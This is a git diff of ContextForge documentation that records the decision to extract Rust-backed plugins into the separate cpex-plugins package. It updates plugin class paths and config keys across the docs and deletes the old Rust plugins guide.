proven pattern already used by Python-facing Rust projects: +ship fast native code behind a normal Python import surface. + +### Why install through `uv` and the `plugins` extra + +The gateway should consume these plugins the same way users do: as declared +dependencies, not as hidden in-tree source code. + +Using `uv` and the optional `plugins` dependency group makes that explicit: + +- plugin dependencies are resolved and locked like other Python dependencies +- CI can opt into plugin support with `uv run --extra plugins ...` +- container builds can install the same dependency set consistently +- plugin runtime behavior is tested against the published package shape rather + than an in-repo implementation shortcut + +This also makes the contract clearer: if a plugin is managed and supported as a +package, the gateway depends on the package artifact, not on its source tree +being present inside `mcp-context-forge`. + +## Follow-On Operating Plan + +The PR discussion's **Step 1 / Step 2** plan is accepted as a separate +stabilization plan for `cpex-plugins`, not as the definition of the initial +extraction order. + +### Step 1 + +- Move the targeted managed plugins out to `cpex-plugins`. +- Keep gateway-facing plugin tests in `mcp-context-forge`. +- Freeze plugin development in `cpex-plugins` temporarily. + +The purpose of this freeze is to avoid unrelated plugin-repo changes breaking +`mcp-context-forge` CI while compatibility testing is still coupled to the +gateway repository. + +### Step 2 + +- Define and implement the long-term compatibility-testing model for + `cpex-plugins`. +- Likely options include cloning `mcp-context-forge` during plugin CI or + otherwise running gateway compatibility suites from the plugin repo. +- Once that compatibility loop is reliable, unfreeze plugin development in + `cpex-plugins`. + +## Alternatives Considered + +### Keep all plugin code in `mcp-context-forge` + +Rejected. This keeps plugin release cadence, Rust build requirements, and core +gateway CI tightly coupled. + +### Move all plugins, including Python-only plugins, at once + +Rejected for now. This increases migration scope and risk before the external +plugin operating model is proven. + +### Keep old Python counterparts inside `cpex-plugins` + +Rejected. `cpex-plugins` is the managed packaged-plugin repo, not a home for +historical or example implementations with weaker support guarantees. + +### Delete old Python counterparts entirely + +Rejected. Some of those implementations are still useful as examples, +reference material, or migration aids. + +## References + +- [PR #3965](https://github.com/IBM/mcp-context-forge/pull/3965) +- [IBM/cpex-plugins](https://github.com/IBM/cpex-plugins) +- [IBM/contextforge-examples](https://github.com/IBM/contextforge-examples) +- [ADR-039](039-adopt-fully-independent-plugin-crates-architecture.md) +- [ADR-047](047-incremental-migration-over-rewrite.md) diff --git a/docs/docs/architecture/adr/index.md b/docs/docs/architecture/adr/index.md index e4a9fa72fc..6edc8590aa 100644 --- a/docs/docs/architecture/adr/index.md +++ b/docs/docs/architecture/adr/index.md @@ -50,5 +50,6 @@ This page tracks all significant design decisions made for ContextForge project, | 0045 | Authentication and Authorization Remain in Core | Proposed | Security | 2026-03-15 | | 0046 | Shared-Nothing Between Protocol Modules | Proposed | Architecture | 2026-03-15 | | 0047 | Incremental Migration Over Rewrite | Proposed | Architecture | 2026-03-15 | +| 0048 | Extract Rust-Backed Plugins First and Preserve Python Examples Separately | Accepted | Architecture | 2026-04-10 | > ✳️ Add new decisions chronologically and link to them from this table. diff --git a/docs/docs/architecture/explorer.html b/docs/docs/architecture/explorer.html index 3cfcf19bf7..1d2ad751b2 100644 --- a/docs/docs/architecture/explorer.html +++ b/docs/docs/architecture/explorer.html @@ -4825,7 +4825,6 @@

Testing Matrix

{ name:"Web Lint", file:"lint-web.yml", desc:"ESLint, HTMLHint, Stylelint in separate matrix jobs.", triggers:["push","PR"] }, { name:"Playwright CI Smoke", file:"playwright.yml", desc:"UI automation smoke tests against live gateway.", triggers:["push","PR","manual"] }, { name:"Rust Tools CI/CD", file:"rust-tools.yml", desc:"Cargo test and clippy for tools_rust/ and mcp-servers/rust/.", triggers:["push"] }, - { name:"Rust Plugins CI/CD", file:"rust-plugins.yml", desc:"Cargo test and clippy for plugins_rust/ on all OS.", triggers:["push"] }, { name:"Alembic Upgrade Validation", file:"alembic-upgrade-validation.yml", desc:"Validate DB migration paths (upgrade testing).", triggers:["PR","push","manual"] }, { name:"License Check", file:"license-check.yml", desc:"Scan for license compliance on dependency changes.", triggers:["push","PR"] }, { name:"Full Linting", file:"linting-full.yml", desc:"Comprehensive linting pass on main branch.", triggers:["push","manual"] }, diff --git a/docs/docs/architecture/plugins.md b/docs/docs/architecture/plugins.md index 4a62ac8134..2e8ab7c5a9 100644 --- a/docs/docs/architecture/plugins.md +++ b/docs/docs/architecture/plugins.md @@ -153,7 +153,7 @@ Below is an example of a plugin configuration file. A plugin configuration file plugins: - name: "PIIFilterPlugin" # Unique plugin identifier - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" # Plugin class path + kind: "cpex_pii_filter.PIIFilterPlugin" # Plugin class path description: "Detects and masks PII" # Human-readable description version: "1.0.0" # Plugin version author: "Security Team" # Plugin author @@ -195,7 +195,7 @@ Details of each field are below: | Field | Type | Required | Default | Description | Example Values | |-------|------|----------|---------|-------------|----------------| | `name` | `string` | Yes | - | Unique plugin identifier within the configuration | `"PIIFilterPlugin"`, `"OpenAIModeration"` | -| `kind` | `string` | Yes | - | Plugin class path for native plugins or `"external"` for MCP servers | `"plugins.pii_filter.pii_filter.PIIFilterPlugin"`, `"external"` | +| `kind` | `string` | Yes | - | Plugin class path for native plugins or `"external"` for MCP servers | `"cpex_pii_filter.PIIFilterPlugin"`, `"external"` | | `description` | `string` | | `null` | Human-readable description of plugin functionality | `"Detects and masks PII in requests"` | | `author` | `string` | | `null` | Plugin author or team responsible for maintenance | `"Security Team"`, `"AI Safety Group"` | | `version` | `string` | | `null` | Plugin version for tracking and compatibility | `"1.0.0"`, `"2.3.1-beta"` | @@ -398,7 +398,7 @@ The plugin manifest follows a structured YAML format that captures comprehensive ```yaml # plugin-manifest.yaml name: "Advanced PII Filter" -kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" +kind: "cpex_pii_filter.PIIFilterPlugin" description: "Comprehensive PII detection and masking with configurable sensitivity levels" author: "Security Engineering Team" version: "2.1.0" @@ -495,7 +495,7 @@ deployment: | Field | Type | Required | Description | Example | |-------|------|----------|-------------|---------| | `name` | `string` | Yes | Human-readable plugin name | `"Advanced PII Filter"` | -| `kind` | `string` | Yes | Plugin class path | `"plugins.pii_filter.pii_filter.PIIFilterPlugin"` | +| `kind` | `string` | Yes | Plugin class path | `"cpex_pii_filter.PIIFilterPlugin"` | | `description` | `string` | Yes | Detailed plugin description | `"Comprehensive PII detection with GDPR compliance"` | | `author` | `string` | Yes | Plugin author or team | `"Security Engineering Team"` | | `version` | `string` | Yes | Semantic version | `"2.1.0"` | @@ -1761,7 +1761,7 @@ class TestPIIFilterPlugin: async def test_pii_detection_and_masking(self): config = PluginConfig( name="test_pii", - kind="plugins.pii_filter.pii_filter.PIIFilterPlugin", + kind="cpex_pii_filter.PIIFilterPlugin", hooks=[HookType.PROMPT_PRE_FETCH], config={"detect_ssn": True, "mask_strategy": "partial"} ) diff --git a/docs/docs/development/release-management.md b/docs/docs/development/release-management.md index 44514b75ba..d8085d1aa6 100644 --- a/docs/docs/development/release-management.md +++ b/docs/docs/development/release-management.md @@ -155,9 +155,6 @@ python .github/tools/update_dependencies.py --file plugins/external/cedar/pyproj python .github/tools/update_dependencies.py --file plugins/external/llmguard/pyproject.toml python .github/tools/update_dependencies.py --file plugins/external/opa/pyproject.toml -# Rust plugins (Python bindings) -python .github/tools/update_dependencies.py --file plugins_rust/pyproject.toml - # Requirements files python .github/tools/update_dependencies.py --file docs/requirements.txt python .github/tools/update_dependencies.py --file tests/load/requirements.txt @@ -204,7 +201,6 @@ Update `Cargo.lock` files for all Rust crates and verify they build and pass tes ```bash # Update dependencies -cd plugins_rust && cargo update && cd .. cd mcp-servers/rust/fast-test-server && cargo update && cd ../../.. cd mcp-servers/rust/filesystem-server && cargo update && cd ../../.. cd tools_rust/wrapper && cargo update && cd ../.. @@ -778,7 +774,7 @@ Edit `plugins/config.yaml` to set the PII filter plugin to enforce mode: ```yaml - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" mode: "enforce" # Change from "disabled" to "enforce" priority: 50 config: @@ -1322,9 +1318,7 @@ make install-dev make pip-audit # 2. Rust / Go / JS / CDN dependency updates -cd plugins_rust && cargo update && cd .. # ... repeat for all Cargo.toml dirs (see Section 3) ... -make rust-check # ... go get -u ./... && go mod tidy for all go.mod dirs ... make linting-go-gosec linting-go-govulncheck npm update && npm audit && npm audit fix diff --git a/docs/docs/howto/code-engine-plugin-configmap.md b/docs/docs/howto/code-engine-plugin-configmap.md index 2c1fdec403..efee63ca84 100644 --- a/docs/docs/howto/code-engine-plugin-configmap.md +++ b/docs/docs/howto/code-engine-plugin-configmap.md @@ -34,7 +34,7 @@ plugin_settings: plugins: # PII Filter — detect and mask sensitive data - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" description: "Detects and masks Personally Identifiable Information" version: "0.1.0" hooks: diff --git a/docs/docs/manage/configuration-plugins.md b/docs/docs/manage/configuration-plugins.md index 22a6d343ae..04bc336e77 100644 --- a/docs/docs/manage/configuration-plugins.md +++ b/docs/docs/manage/configuration-plugins.md @@ -26,6 +26,17 @@ Inside the gateway, plugin settings are exposed under `settings.plugins`. | `PLUGINS_LOG_LEVEL` | Plugin framework log level | `INFO` | string | | `PLUGINS_SKIP_SSL_VERIFY` | Skip TLS verification for plugin HTTP requests | `false` | bool | +### Plugin Package Installation (docker-entrypoint.sh) + +These variables are evaluated by `docker-entrypoint.sh` at container startup, before the application server begins. They allow re-installing or overriding plugin packages at runtime without rebuilding the container image. + +When `RELOAD_PLUGIN_REQUIREMENTS_TXT=true`, startup is fail-closed: the requirements file must resolve under `/app`, exist, and install successfully, or the container exits before serving traffic. + +| Setting | Description | Default | Options | +| ---------------------------------- | ---------------------------------------------------------------- | ---------------------------------- | ------- | +| `RELOAD_PLUGIN_REQUIREMENTS_TXT` | Re-install plugin packages from requirements file at startup | `false` | bool | +| `PLUGIN_REQUIREMENTS_TXT_PATH` | Path to the plugin requirements file | `/app/plugins/requirements.txt` | string | + ### HTTP Client Settings | Setting | Description | Default | Options | diff --git a/docs/docs/testing/unittest.md b/docs/docs/testing/unittest.md index 0c7d11566f..6073b84ff4 100644 --- a/docs/docs/testing/unittest.md +++ b/docs/docs/testing/unittest.md @@ -225,13 +225,10 @@ The remaining ~93% is DOM manipulation, fetch calls, Chart.js rendering, and HTM | tests/unit/mcpgateway/plugins/plugins/markdown_cleaner/test_markdown_cleaner.py | 1 | 0 | 1 | | tests/unit/mcpgateway/plugins/plugins/json_repair/test_json_repair.py | 1 | 0 | 1 | | tests/unit/mcpgateway/plugins/plugins/output_length_guard/test_output_length_guard.py | 5 | 0 | 5 | -| tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py | 18 | 0 | 18 | | tests/unit/mcpgateway/plugins/plugins/resource_filter/test_resource_filter.py | 15 | 0 | 15 | -| tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py | 1 | 0 | 1 | | tests/unit/mcpgateway/plugins/plugins/response_cache_by_prompt/test_response_cache_by_prompt.py | 19 | 0 | 19 | | tests/unit/mcpgateway/plugins/plugins/schema_guard/test_schema_guard.py | 1 | 0 | 1 | | tests/unit/mcpgateway/plugins/plugins/test_init_hooks_plugins.py | 107 | 0 | 107 | -| tests/unit/mcpgateway/plugins/plugins/url_reputation/test_url_reputation.py | 1 | 0 | 1 | | tests/unit/mcpgateway/plugins/plugins/vault/test_vault_plugin.py | 9 | 0 | 9 | | tests/unit/mcpgateway/plugins/plugins/vault/test_vault_plugin_smoke.py | 3 | 0 | 3 | | tests/unit/mcpgateway/plugins/plugins/virus_total_checker/test_virus_total_checker.py | 8 | 0 | 8 | diff --git a/docs/docs/using/plugins/.pages b/docs/docs/using/plugins/.pages index fb92696163..003cf92fa5 100644 --- a/docs/docs/using/plugins/.pages +++ b/docs/docs/using/plugins/.pages @@ -6,4 +6,3 @@ nav: - grpc-transport.md - unix-socket-transport.md - mtls.md - - rust-plugins.md diff --git a/docs/docs/using/plugins/grpc-transport.md b/docs/docs/using/plugins/grpc-transport.md index 9d7ece18bd..ce1027cbd1 100644 --- a/docs/docs/using/plugins/grpc-transport.md +++ b/docs/docs/using/plugins/grpc-transport.md @@ -105,7 +105,7 @@ The plugin server reads its configuration from a YAML file. Configure the gRPC s # resources/plugins/config.yaml (on the plugin server) plugins: - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["tool_pre_invoke", "tool_post_invoke"] mode: "enforce" priority: 50 diff --git a/docs/docs/using/plugins/index.md b/docs/docs/using/plugins/index.md index 9d1701fa80..7d731b02d1 100644 --- a/docs/docs/using/plugins/index.md +++ b/docs/docs/using/plugins/index.md @@ -178,7 +178,7 @@ is below. It contains two main sections: `plugins` and `plugin_settings`. plugins: - name: "PIIFilterPlugin" # Unique plugin identifier - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" # Plugin class path + kind: "cpex_pii_filter.PIIFilterPlugin" # Plugin class path description: "Detects and masks PII" # Human-readable description version: "1.0.0" # Plugin version author: "Security Team" # Plugin author @@ -202,7 +202,7 @@ plugins: config: # Plugin-specific configuration detect_ssn: true detect_credit_card: true - mask_strategy: "partial" + default_mask_strategy: "partial" redaction_text: "[REDACTED]" # Global plugin settings @@ -215,7 +215,13 @@ plugin_settings: ## Getting Started (Native Plugins) -Use the native plugins out of the box: +Use the packaged native plugins after installing the optional plugin extra: + +```bash +uv sync --extra plugins +``` + +Or install the published plugin wheels with `pip install 'mcp-contextforge-gateway[plugins]'`. 1. Copy and adapt the example config (enable any subset): @@ -224,7 +230,7 @@ Use the native plugins out of the box: plugins: - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch", "prompt_post_fetch", "tool_pre_invoke", "tool_post_invoke"] mode: "permissive" priority: 50 @@ -289,7 +295,7 @@ are defined as follows: | Field | Type | Required | Default | Description | Example Values | |-------|------|----------|---------|-------------|----------------| | `name` | `string` | Yes | - | Unique plugin identifier within the configuration | `"PIIFilterPlugin"`, `"OpenAIModeration"` | -| `kind` | `string` | Yes | - | Plugin class path for native plugins or `"external"` for MCP servers | `"plugins.pii_filter.pii_filter.PIIFilterPlugin"`, `"external"` | +| `kind` | `string` | Yes | - | Plugin class path for native plugins or `"external"` for MCP servers | `"cpex_pii_filter.PIIFilterPlugin"`, `"external"` | | `description` | `string` | | `null` | Human-readable description of plugin functionality | `"Detects and masks PII in requests"` | | `author` | `string` | | `null` | Plugin author or team responsible for maintenance | `"Security Team"`, `"AI Safety Group"` | | `version` | `string` | | `null` | Plugin version for tracking and compatibility | `"1.0.0"`, `"2.3.1-beta"` | @@ -298,7 +304,7 @@ are defined as follows: | `mode` | `string` | | `"enforce"` | Plugin execution mode controlling behavior on violations | `"enforce"`, `"enforce_ignore_error"`, `"permissive"`, `"disabled"` | | `priority` | `integer` | | `null` | Execution priority (lower number = higher priority) | `10`, `50`, `100` | | `conditions` | `object[]` | | `[]` | Conditional execution rules for targeting specific contexts | See [Condition Fields](#condition-fields) below | -| `config` | `object` | | `{}` | Plugin-specific configuration parameters | `{"detect_ssn": true, "mask_strategy": "partial"}` | +| `config` | `object` | | `{}` | Plugin-specific configuration parameters | `{"detect_ssn": true, "default_mask_strategy": "partial"}` | | `mcp` | `object` | | `null` | External MCP server configuration (required for external plugins) | See [MCP Configuration](#mcp-configuration-fields) below | #### Hook Types @@ -1250,7 +1256,7 @@ Plugin management endpoints are not exposed in the gateway at this time. plugins: # Step 1: PII Detection and Masking (Highest Priority) - name: "PIIFilter" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch", "prompt_post_fetch", "tool_pre_invoke", "tool_post_invoke"] mode: "enforce" priority: 10 @@ -1258,7 +1264,7 @@ plugins: detect_ssn: true detect_credit_card: true detect_email: true - mask_strategy: "partial" + default_mask_strategy: "partial" block_on_detection: false # Step 2: External AI Safety Service (LlamaGuard) @@ -1337,14 +1343,14 @@ plugins: plugins: - name: "DevPIIFilter" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch", "tool_pre_invoke"] mode: "permissive" # Don't block in dev priority: 50 config: detect_ssn: true log_detections: true - mask_strategy: "partial" + default_mask_strategy: "partial" whitelist_patterns: - "test@example.com" @@ -1355,7 +1361,7 @@ plugins: plugins: - name: "ProdPIIFilter" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch", "prompt_post_fetch", "tool_pre_invoke", "tool_post_invoke"] mode: "enforce" # Block in production priority: 10 @@ -1366,8 +1372,8 @@ plugins: detect_email: true detect_api_keys: true block_on_detection: true - audit_detections: true - compliance_mode: "strict" + log_detections: true + include_detection_details: true ``` ## Performance and Scalability diff --git a/docs/docs/using/plugins/plugins.md b/docs/docs/using/plugins/plugins.md index 21ca30b39c..79b0a538cb 100644 --- a/docs/docs/using/plugins/plugins.md +++ b/docs/docs/using/plugins/plugins.md @@ -20,14 +20,14 @@ Plugins for protecting against security threats, detecting sensitive data, and m | Plugin | Type | Description | |--------|------|-------------| | [Simple Token Auth](https://github.com/IBM/mcp-context-forge/tree/main/plugins/examples/simple_token_auth) | Native | Custom token-based authentication with file storage, expiration, and CLI management. Complete example of HTTP authentication hooks (http_pre_request, http_auth_resolve_user, http_auth_check_permission, http_post_request) | -| [PII Filter](https://github.com/IBM/mcp-context-forge/tree/main/plugins/pii_filter) | Native | Detects and masks sensitive information including SSN, credit cards, and emails with configurable masking strategies | -| [Secrets Detection](https://github.com/IBM/mcp-context-forge/tree/main/plugins/secrets_detection) | Native | Detects likely credentials/secrets (AWS keys, API keys, JWT tokens, private keys) in inputs and outputs with optional redaction and blocking | +| [PII Filter](https://pypi.org/project/cpex-pii-filter/) | Package | Detects and masks sensitive information including SSN, credit cards, and emails with configurable masking strategies | +| [Secrets Detection](https://pypi.org/project/cpex-secrets-detection/) | Package | Detects likely credentials/secrets (AWS keys, API keys, JWT tokens, private keys) in inputs and outputs with optional redaction and blocking | | [Code Safety Linter](https://github.com/IBM/mcp-context-forge/tree/main/plugins/code_safety_linter) | Native | Detects unsafe code patterns in tool outputs (eval, exec, os.system, subprocess, rm -rf) | | [Safe HTML Sanitizer](https://github.com/IBM/mcp-context-forge/tree/main/plugins/safe_html_sanitizer) | Native | Sanitizes HTML to remove XSS vectors, dangerous tags, event handlers, and bad URL schemes with optional text conversion | | [SQL Sanitizer](https://github.com/IBM/mcp-context-forge/tree/main/plugins/sql_sanitizer) | Native | Detects risky SQL patterns and sanitizes/blocks dangerous statements (DROP, TRUNCATE, DELETE/UPDATE without WHERE) | | [Harmful Content Detector](https://github.com/IBM/mcp-context-forge/tree/main/plugins/harmful_content_detector) | Native | Detects harmful content (self-harm, violence, hate speech) via lexicons and blocks or annotates accordingly | | [Content Moderation](https://github.com/IBM/mcp-context-forge/tree/main/plugins/content_moderation) | Native | Advanced AI-powered content moderation using IBM Watson, IBM Granite Guardian, OpenAI, Azure, or AWS with configurable thresholds and actions | -| [URL Reputation](https://github.com/IBM/mcp-context-forge/tree/main/plugins/url_reputation) | Native | Static URL reputation checks using blocked domains and patterns | +| [URL Reputation](https://pypi.org/project/cpex-url-reputation/) | Package | Static URL reputation checks using blocked domains and patterns | | [VirusTotal Checker](https://github.com/IBM/mcp-context-forge/tree/main/plugins/virus_total_checker) | Native | Integrates with VirusTotal v3 to check URLs, domains, IPs, and file hashes before fetching with configurable blocking policies | | [LLMGuard](https://github.com/IBM/mcp-context-forge/tree/main/plugins/external/llmguard) | External | Comprehensive AI guardrails utilizing LLM Guard library with filters and sanitizers for input prompts and model outputs. Supports complex policy expressions and vault-based anonymization | | [ClamAV Remote](https://github.com/IBM/mcp-context-forge/tree/main/plugins/external/clamav_server) | External | External MCP server plugin that scans files and text content using ClamAV for malware detection in resources, prompts, and tool outputs | @@ -40,10 +40,10 @@ Plugins for improving system reliability, performance, and resource management. |--------|------|-------------| | [Circuit Breaker](https://github.com/IBM/mcp-context-forge/tree/main/plugins/circuit_breaker) | Native | Trips per-tool breaker on high error rates or consecutive failures and blocks during cooldown | | [Watchdog](https://github.com/IBM/mcp-context-forge/tree/main/plugins/watchdog) | Native | Enforces maximum runtime for tools with warn or block actions on threshold violations | -| [Rate Limiter](https://github.com/IBM/mcp-context-forge/tree/main/plugins/rate_limiter) | Native | Per-user, tenant, and tool rate limiting with selectable algorithms (fixed_window, sliding_window, token_bucket) and memory or Redis backends | +| [Rate Limiter](https://pypi.org/project/cpex-rate-limiter/) | Package | Rate limiting by user, tenant, or tool with fixed-window, sliding-window, and token-bucket algorithms; memory and Redis backends | | [Cached Tool Result](https://github.com/IBM/mcp-context-forge/tree/main/plugins/cached_tool_result) | Native | Caches idempotent tool results in-memory with configurable TTL and key fields | | [Response Cache by Prompt](https://github.com/IBM/mcp-context-forge/tree/main/plugins/response_cache_by_prompt) | Native | Advisory response cache using cosine similarity over prompt/input fields with configurable threshold | -| [Retry with Backoff](https://github.com/IBM/mcp-context-forge/tree/main/plugins/retry_with_backoff) | Native | Annotates retry/backoff policy in metadata with exponential backoff on specific HTTP status codes | +| [Retry with Backoff](https://pypi.org/project/cpex-retry-with-backoff/) | Package | Annotates retry/backoff policy in metadata with exponential backoff on specific HTTP status codes | ## Observability & Monitoring @@ -133,7 +133,7 @@ Example configuration: plugins: - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["tool_pre_invoke", "tool_post_invoke"] mode: "enforce" priority: 50 diff --git a/docs/docs/using/plugins/rust-plugins.md b/docs/docs/using/plugins/rust-plugins.md deleted file mode 100644 index cc3a622ce7..0000000000 --- a/docs/docs/using/plugins/rust-plugins.md +++ /dev/null @@ -1,591 +0,0 @@ -# Rust Plugins - High-Performance Native Extensions - -!!! success "Production Ready" - Rust plugins provide **5-10x performance improvements** for computationally intensive operations while maintaining 100% API compatibility with Python plugins. - -## Overview - -MCP Gateway supports high-performance Rust implementations of plugins through PyO3 bindings. Each Rust plugin is fully independent with its own build configuration, providing significant performance benefits for computationally expensive operations while maintaining transparent Python integration. - -### Key Benefits - -- **🚀 5-10x Performance**: Native compilation, zero-copy operations, parallel processing -- **🔄 Seamless Integration**: Automatic fallback to Python when Rust unavailable -- **📦 Zero Breaking Changes**: Identical API to Python plugins -- **⚙️ Auto-Detection**: Automatically uses Rust when available -- **🛡️ Memory Safe**: Rust's ownership system prevents common bugs -- **🔧 Easy Deployment**: Single wheel package, no manual compilation needed - -## Architecture - -### Independent Plugin Structure - -``` -plugins_rust/ -├── [plugin_name]/ # Each plugin is fully independent -│ ├── Cargo.toml # Rust dependencies -│ ├── pyproject.toml # Python packaging -│ ├── Makefile # Build commands -│ └── src/ # Rust source code -└── [another_plugin]/ # Another independent plugin -``` - -### Hybrid Python + Rust Design - -``` -┌─────────────────────────────────────────────────────────┐ -│ Python Plugin Layer (plugins/[name]/plugin.py) │ -│ │ -│ ┌──────────────────────────────────────────────────┐ │ -│ │ Auto-Detection Logic │ │ -│ │ - Check Rust availability │ │ -│ │ - Select implementation │ │ -│ └──────────────────────────────────────────────────┘ │ -│ │ │ │ -│ ┌───────┴──────┐ ┌───────┴────────┐ │ -│ │ Rust Wrapper │ │ Python Fallback│ │ -│ │ (5-10x fast)│ │ (Pure Python) │ │ -│ └───────┬──────┘ └────────────────┘ │ -└──────────────┼────────────────────────────────────────┘ - │ - │ PyO3 Bindings - ▼ -┌──────────────────────────────────────┐ -│ Rust Implementation (plugins_rust/) │ -│ │ -│ ┌────────────────────────────────┐ │ -│ │ Plugin Engine │ │ -│ │ - Parallel processing │ │ -│ │ - Zero-copy operations │ │ -│ │ - Efficient algorithms │ │ -│ └────────────────────────────────┘ │ -│ │ -│ Compiled to: plugin_rust.so │ -└──────────────────────────────────────┘ -``` - -## Installation - -### Option 1: Build from Source (Recommended) - -```bash -# Install Rust toolchain using the official instructions: -# https://rustup.rs/ - -# Build specific plugin -cd plugins_rust/[plugin_name] -make install - -# Or build all plugins from project root -make rust-dev -``` - -### Option 2: Use Python Fallback - -```bash -# Standard installation (Python-only) -pip install mcpgateway - -# Rust plugins will gracefully fall back to Python implementations -``` - -## Configuration - -### Plugin Configuration - -No changes needed! Rust plugins use the same configuration as Python: - -```yaml -# plugins/config.yaml -plugins: - - name: "MyPlugin" - kind: "plugins.my_plugin.my_plugin.MyPlugin" - hooks: - - "prompt_pre_fetch" - - "tool_pre_invoke" - mode: "enforce" - priority: 50 - config: - # Plugin-specific configuration - option1: true - option2: "value" -``` - -## Usage - -### Automatic Detection - -The plugin system automatically detects and uses the Rust implementation: - -```python -from plugins.my_plugin.my_plugin import MyPlugin -from plugins.framework import PluginConfig - -# Create plugin (automatically uses Rust if available) -config = PluginConfig( - name="my_plugin", - kind="plugins.my_plugin.my_plugin.MyPlugin", - config={} -) -plugin = MyPlugin(config) - -# Check which implementation is being used -print(f"Implementation: {plugin.implementation}") -# Output: "rust" or "python" -``` - -### Direct API Usage - -You can also use the implementations directly: - -```python -# Use Rust implementation explicitly -from plugin_rust.plugin_rust import PluginRust - -config = {"option1": True, "option2": "value"} -plugin = PluginRust(config) - -# Use plugin methods -result = plugin.process(data) -``` - -## Verification - -### Check Installation - -```bash -# Verify Rust plugin is available -python -c "from plugin_rust.plugin_rust import PluginRust; print('✓ Rust plugin available')" - -# Check implementation being used -python -c " -from plugins.my_plugin.my_plugin import MyPlugin -from plugins.framework import PluginConfig -config = PluginConfig(name='test', kind='test', config={}) -plugin = MyPlugin(config) -print(f'Implementation: {plugin.implementation}') -" -``` - -### Logging - -The gateway logs which implementation is being used: - -``` -# With Rust available -INFO - ✓ Plugin: Using Rust implementation (5-10x faster) - -# Without Rust -WARNING - Plugin: Using Python implementation -WARNING - 💡 Build Rust plugins for better performance -``` - -## Building from Source - -### Prerequisites - -- Rust 1.70+ (install via the official `rustup` instructions at ) -- Python 3.11+ -- maturin (`pip install maturin`) - -### Build Steps - -```bash -# Navigate to a specific Rust plugin directory -cd plugins_rust/pii_filter - -# Build in development mode (with debug symbols) -maturin develop - -# Build in release mode (optimized) -maturin develop --release - -# Build wheel package -maturin build --release -``` - -### Using Make - -```bash -# From project root (builds all plugins) -make rust-dev # Build and install (development mode) -make rust-build # Build release wheel -make rust-test # Run Rust unit tests -make rust-verify # Verify installation - -# From individual plugin directory -cd plugins_rust/pii_filter -make develop # Build and install -make test # Run tests -make bench # Run benchmarks -make bench-compare # Compare Rust vs Python performance -``` - -## Performance Benchmarking - -### Built-in Benchmarks - -```bash -# Run Rust benchmarks (Criterion) for a specific plugin -cd plugins_rust/pii_filter -make bench - -# Run Python vs Rust comparison -make bench-compare - -# Or from project root (runs all plugin benchmarks) -make rust-bench -``` - -### Sample Benchmark Output - -``` -━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -PII Filter Performance Comparison: Python vs Rust -━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ - -1. Single SSN Detection -──────────────────────────────────────────────────────────────── -Python: 0.150 ms (7.14 MB/s) -Rust: 0.020 ms (53.57 MB/s) -Speedup: 7.5x faster - -2. Multiple PII Types Detection -──────────────────────────────────────────────────────────────── -Python: 0.300 ms (3.57 MB/s) -Rust: 0.040 ms (26.79 MB/s) -Speedup: 7.5x faster - -3. Large Text Performance (1000 PII instances) -──────────────────────────────────────────────────────────────── -Python: 150.000 ms (0.71 MB/s) -Rust: 18.000 ms (5.95 MB/s) -Speedup: 8.3x faster - -━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -Summary -━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -Average Speedup: 7.8x -✓ GREAT: 5-10x speedup - Recommended for production -``` - -## Testing - -### Running Tests - -```bash -# Rust unit tests (from a specific plugin directory) -cd plugins_rust/pii_filter -cargo test - -# Python integration tests -pytest tests/unit/mcpgateway/plugins/test_pii_filter.py - -# Differential tests (Rust vs Python compatibility) -pytest tests/differential/test_pii_filter_differential.py - -# Or use make -make rust-test-all # Run all tests -``` - -### Test Coverage - -The Rust plugin system includes comprehensive testing: - -- **Rust Unit Tests**: 14 tests covering core Rust functionality -- **Python Integration Tests**: 45 tests covering PyO3 bindings -- **Differential Tests**: 40+ tests ensuring Rust = Python outputs -- **Performance Tests**: Benchmarks verifying >5x speedup - -## Troubleshooting - -### Rust Plugin Not Available - -**Symptom**: Logs show "Using Python implementation" - -**Solutions**: -```bash -# 1. Check if Rust extension is installed -python -c "from pii_filter import PIIDetectorRust; print('OK')" - -# 2. Build from source -cd plugins_rust/pii_filter -maturin develop --release -``` - -### Import Errors - -**Symptom**: `ImportError: cannot import name 'PIIDetectorRust'` - -**Solutions**: -```bash -# 1. Verify installation -pip list | grep mcpgateway-pii-filter - -# 2. Rebuild -cd plugins_rust/pii_filter -maturin develop --release - -# 3. Check Python version (requires 3.11+) -python --version -``` - -### Performance Not Improved - -**Symptom**: No performance difference between Python and Rust - -**Checks**: -```python -# Verify Rust implementation is being used -from plugins.my_plugin.my_plugin import MyPlugin -plugin = MyPlugin(config) -assert plugin.implementation == "rust", "Not using Rust!" -``` - -### Build Failures - -**Symptom**: `maturin develop` fails - -**Common Causes**: - -1. 